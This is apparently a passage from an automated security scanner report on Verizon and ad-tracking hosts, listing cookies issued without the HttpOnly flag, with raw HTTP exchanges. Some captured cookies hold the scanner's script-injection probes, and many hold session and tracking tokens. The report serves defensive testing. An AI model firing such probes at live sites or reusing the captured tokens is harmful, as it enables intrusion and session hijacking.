GET /hc/2329305/cmd/url/?site=2329305&SV!click-query-name=chat-sb_com-sales-english-2&SV!click-query-room=chat-sb_com-sales-english-2&SV!click-query-state=Available&SV!click-query-channel=web&page=http%3A//sales.liveperson.net/hc/2329305/%3Fcmd%3Dfile%26file%3DvisitorWantsToChat%26site%3D2329305%26SV%21chat-button-name%3Dchat-sb_com-sales-english-2%26SV%21chat-button-room%3Dchat-sb_com-sales-english-2%26referrer%3D%28button%2520dynamic-button%3Achat-sb_com-sales-english-2%28Business%2520Phone%2520Plans%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Service%2520%257C%2520Verizon%2520Voice%29%29%2520http%253A//smallbusiness.verizon.com/products/voice/plans.aspx&id=1535582035&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1315279372239 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7744157426393992956; LivePersonID=-5110247826455-1315261003:-1:1315261074:-1:-1; HumanClickSiteContainerID_2329305=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ; ASPSESSIONIDSQDBATSC=LPFNAFOBBADLNADJGJPHJDMH; HumanClickACTIVE=1315261349848

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Sep 2011 22:23:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
Set-Cookie: LivePersonID=-5110247826455-1315261003:-1:1315261074:-1:-1; expires=Tue, 04-Sep-2012 22:23:18 GMT; path=/hc/2329305; domain=.liveperson.net
Location: http://sales.liveperson.net/hc/2329305/?cmd=file&file=visitorWantsToChat&site=2329305&SV!chat-button-name=chat-sb_com-sales-english-2&SV!chat-button-room=chat-sb_com-sales-english-2&referrer=(button%20dynamic-button:chat-sb_com-sales-english-2(Business%20Phone%20Plans%20%7C%20Local%20%26%20Long%20Distance%20Service%20%7C%20Verizon%20Voice))%20http%3A//smallbusiness.verizon.com/products/voice/plans.aspx
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0


10.88. http://sales.liveperson.net/hc/44153975/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/44153975/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/44153975/?lpCallId=681711290471-672671612237&protV=20&lpjson=1&site=44153975&cmd=mTagKnockPage&id=6680413031&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-persistent-consumer-english%7ClpMTagConfig.dbPersistent%7ClpButtonPersistent%7C%23generic-consumer-english%7ClpMTagConfig.dbDual%7Clpchatdynamicbuttondiv%7C&cookie=GLOBALID%3DtWRJzfV%252FzyamDVoURNGmO7smtgitROzrsjFa48jF8jyYMlJxx5Bllp8fvpJxcQO4%3B%20%20mbox%3Dcheck%23true%231315278966%7Csession%231315278871714-190238%231315280766%7CPC%231315278871714-190238.19%231316488506%3B%20gnVersion%3D2011Jul31030844%3B%20CP%3Dnull* HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp
Cookie: LivePersonID=LP i=546022977410,d=1312768968

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:15:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=1079782148047996108; path=/hc/44153975
Set-Cookie: HumanClickACTIVE=1315260925061; expires=Tue, 06-Sep-2011 22:15:25 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:15:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27926

lpConnLib.Process({"ResultSet": {"lpCallId":"681711290471-672671612237","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.89. http://sales.liveperson.net/hc/44153975/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/44153975/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/44153975/?lpCallId=989132328424-943083492107&protV=20&lpjson=1&site=44153975&cmd=mTagKnockPage&id=2622394683&javaSupport=true&visitorStatus=INSITE_STATUS&cookie=GLOBALID%3DJHPrv0rWj7yocbPko%252BHLF8zqOnD3%252FSV22d7pwWM5O%252FNFRQcl%252By5AJJhaVp3nPNUb%3B%20%20gnVersion%3D2011Jul31030844%3B%20mbox%3Dsession%231315278939788-568601%231315280864%7CPC%231315278939788-568601.19%231316488604%7Ccheck%23true%231315279064%3B%20mybizCookie%3Dtrue%3B%20CP%3Dnull* HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html?tab=business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5253195599019031161; LivePersonID=-5110247826455-1315260966:-1:1315237110:-1:-1; HumanClickSiteContainerID_44153975=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315261001562; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:16:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315261007076; expires=Tue, 06-Sep-2011 22:16:47 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:16:47 GMT
Set-Cookie: HumanClickSiteContainerID_44153975=Master; path=/hc/44153975
Set-Cookie: LivePersonID=-5110247826455-1315260966:-1:1315237110:-1:-1; expires=Tue, 04-Sep-2012 22:16:47 GMT; path=/hc/44153975; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1480

lpConnLib.Process({"ResultSet": {"lpCallId":"989132328424-943083492107","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.90. http://search.verizon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.verizon.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: search.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; Product=A; ProductXML=A; BusinessUnit=wireless; vsrecentsearches=wss~5d89e%3cscript%3eprompt(%22POTS%22)%3c/script%3e9b63ecd16e6~~~; CP=null*

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 22:33:59 GMT
Server: Atomz/1.0
Set-Cookie: v1stsp=9A1D507944409CB9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verizon.com
Content-Type: text/html; charset=iso-8859-1
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 282

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...

10.91. http://servedby.flashtalking.com/segment/modify/adg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /segment/modify/adg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /segment/modify/adg;;pixel/?name=VerizoncomHomepage&setTime&setTime=0&granularity=day HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: flashtalkingad1="GUID=13153E27A6C6C8"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=13153E27A6C6C8|segment=(adg-t:1343)";Path=/;Domain=.flashtalking.com;Expires=Wed, 04-Sep-13 22:14:45 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 05 Sep 2011 22:14:45 GMT
Server: Jetty(6.1.22)
Content-Type: image/gif
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.92. https://signin.verizon.com/sso/VOLPortalLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/VOLPortalLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/VOLPortalLogin HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Sep 2011 22:35:49 GMT
Server: Apache
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: lob=consumer; domain=.verizon.com; path=/
Set-Cookie: dotcomsid=null; domain=.verizon.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: logout_url=null; domain=.verizon.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Location: https://signin.verizon.com/sso/RememberMeServlet
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 291

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://signin.verizon.com/sso/Rem
...[SNIP]...

10.93. http://statse.webtrendslive.com/dcsi8dupuerp17vzhd59b2lwc_8u5u/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcsi8dupuerp17vzhd59b2lwc_8u5u/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsi8dupuerp17vzhd59b2lwc_8u5u/dcs.gif?&dcsdat=1315278818501&dcssip=verizon.com&dcsuri=/&dcsqry=%3Faaaa=bbbb%22%3Ess%26ccc=dddd%2611111=22222&dcsref=http://www.fakereferrerdominator.com/referrerPathName%3FRefParName=RefValue&WT.tz=-5&WT.bh=22&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.js=Yes&WT.jv=1.5&WT.bs=1069x853&WT.fi=No&WT.tv=8.0.0&WT.sp=@@SPLITVALUE@@&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=50.23.123.106-1186922976.30162294.1315278818504&WT.co_f=50.23.123.106-1186922976.30162294 HTTP/1.1
Host: statse.webtrendslive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://verizon.com/
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTE4NjkyMjk3Ni4zMDE2MjI5NAAAAAAAAAADAAAAnPIAANYLF06dCxdO6/UAAHE1O074NDtOyg8BAEB8W05AfFtOAwAAAK1OAADWCxdOnQsXTtdPAABxNTtO+DQ7ThtTAABAfFtOQHxbTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 22:13:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTE4NjkyMjk3Ni4zMDE2MjI5NAAAAAAAAAAEAAAAnPIAANYLF06dCxdO6/UAAHE1O074NDtOyg8BAEB8W05AfFtOzEsAAJFJZU6RSWVOBAAAAK1OAADWCxdOnQsXTtdPAABxNTtO+DQ7ThtTAABAfFtOQHxbTmseAACRSWVOkUllTgAAAAA-; path=/; expires=Thu, 02-Sep-2021 22:13:37 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.94. http://statse.webtrendslive.com/dcspfpx81frp17vzhd59b2lwc_3u6z/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcspfpx81frp17vzhd59b2lwc_3u6z/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcspfpx81frp17vzhd59b2lwc_3u6z/dcs.gif?&dcsdat=1315279384375&dcssip=www22.verizon.com&dcsuri=/wholesale/solutions/solution/physical%2bcollo.html&dcsref=http://search.verizon.com/%3Fmarket=94531%2Bzz%26q=oss%2Bsq%26rv=b%26st=zz%26tp=c%26u1=q&WT.tz=-5&WT.bh=22&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Verizon%20Global%20Wholesale%20|%20Physical%20Collocation&WT.js=Yes&WT.jv=1.5 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/wholesale/solutions/solution/physical%2bcollo.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAMAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAAIxLZU60SmVOCAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAACMS2VOtEplTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 22:23:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAANAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAAIxLZU60SmVOz0sAANhLZU7IS2VOCAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAADYS2VOtEplTgAAAAA-; path=/; expires=Thu, 02-Sep-2021 22:23:20 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.95. http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://surround.verizon.com
Path:   /Shop/Utilities/verizonyourdomain.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Shop/Utilities/verizonyourdomain.aspx HTTP/1.1
Host: surround.verizon.com
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Mon, 05 Sep 2011 22:21:43 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: quhboZ2MfIRqG-pa__lcCIup88pAltrZVy8ew4aQLHKqTD3B8Z1BOKvlmqD24bzzTmCnb-zIHNG5S4jviu2h1eozOODIgWJs1Mt7wWobBpS3hC580=; path=/
Set-Cookie: IOOrderPg=/Shop/Utilities/verizonyourdomain.aspx; path=/
Set-Cookie: tvState=Y; path=/
Set-Cookie: tvNodeName=Utilities&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;; path=/
Content-Length: 138234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<head>

<title>
...[SNIP]...

10.96. http://syndicate.verizon.net/ads/regionlocator.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/regionlocator.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads/regionlocator.ashx HTTP/1.1
Host: syndicate.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.com/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: image/gif
Content-Length: 243
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; domain=verizon.net; expires=Tue, 06-Sep-2011 22:18:13 GMT; path=/
Set-Cookie: POPRefid=refid=&refresh=y&reftrytime=0&refnum=; domain=verizon.net; expires=Tue, 06-Sep-2011 22:18:13 GMT; path=/

GIF89a......................................................................................

.............33.)).EE.RR.ii.....................................................................yyysssYYYW
...[SNIP]...

10.97. http://tags.bluekai.com/site/4357

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4357

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/4357?ret=html&r=77101&phint=hc3%3D%7C&phint=logInDisplay%3D1&phint=lpLanguage%3Denglish&phint=lpMarket%3Dgeneric&phint=Keywords%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_t%3DCell%20Phone%20Savings%20%26%20Discounts%20-%20Verizon%20Wireless&phint=bk_k%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_pr%3Dhttp%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp
Cookie: bk=Avt5BqOGErjMq/0A; bkc=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; bko=KJyfJLg96vIjbL4/z/meQzsNJCg/ZLEsynOPh5Kw7VWiBTEahcYSiTsCaXCijJeMCfcmzLBRF6xQnYSsmfyyLDxQbhGwuW0VMTcCCj3BcpmeJJEa0999eLDR4Q==; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0aAEWFxNWRCodgovoUDexueejB3qEWx/CK5IC9O6HP/0kdxLHW5OYdys/0ZiPZnOJJ/lb9Yn6JZ6cRhc4zb3Z6V1T8IjfFdqTlfdAR9FGXqrV0tDieHzQImTufRjdRz7P0Bso/mx8rp1BoDNJfsyBauzUfAU123zI+9QxEHC2k5+pGHbEceU7zOvs50zUsILiW5waYyRJrGkmBrtnuCUMHUHWt8dy+bPtTZ/a6hVV968xZJjU3CUlc2f2y3V+wM7ctAppdugxZ/B1DPsqVmbr42jXibKowXOCLQMecXtjfVBb64iKZSLC2hAd8YAtr1TqAJa5SwajkVQKJJDBtk7tiANaL8dNA+/X2/SbxP6FdIV1VZAPMPElf0RqLXbvrEO2xZPiL6UPHpMqI381PLp49xXfLczCgd4rUwApwZL0+fF6gLUGd7bxjCET=; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpb4IudROueYy1ZHDRAFtS3UT9BE6nNx==; bkst=KJhBEf+v9NWDwWP91aWetZGPLwcY7FrIVrQSPyCZN6i/uL9irlzUJuxH1Ri2k7bOvqVhLTiPkHXQPGodTu5T5b+15jQj8L0DTc6KcvqgmNWJw+h5Q8C8BOaVWYA0ugiUS5/pNJ9AkMEVNiS2Nsh+qpFdkdwwyUMRcT8rC+IP6aadMkGsokO0vxPcnqDVE9MpVXCl84yeE87CUcZWoSi/PiRM6ioameG/0twHLtINlw2z7F7yDaYgaR9P/YQ1SrGhxjWpoEtMI5BMyIkgYy9PbcSwg68lypTm2iXZjlrm4NZzijGVDj2n9O+x2TBtzBeLBgBsJh3xTvHNKblwO2AGeeSpP7HTPOIwnGwx2TBmdS5RAPEpYAyZ1+q1/CD357rHozAWzFtIZk59e0VEDi3rLwl3HddTzNKo; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; bklc=4e65298f; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:15:21 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=ht88uCDC+h5Mq/0A; expires=Sat, 03-Mar-2012 22:15:21 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Tue, 06-Sep-2011 22:15:21 GMT; path=/; domain=.bluekai.com
BK-Server: 497b
Content-Length: 77
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">

</div>

</body>
</html>

10.98. http://tap.tapad.com/audience/pxl.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.tapad.com
Path:   /audience/pxl.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /audience/pxl.png?aud_id=4DSP41 HTTP/1.1
Host: tap.tapad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
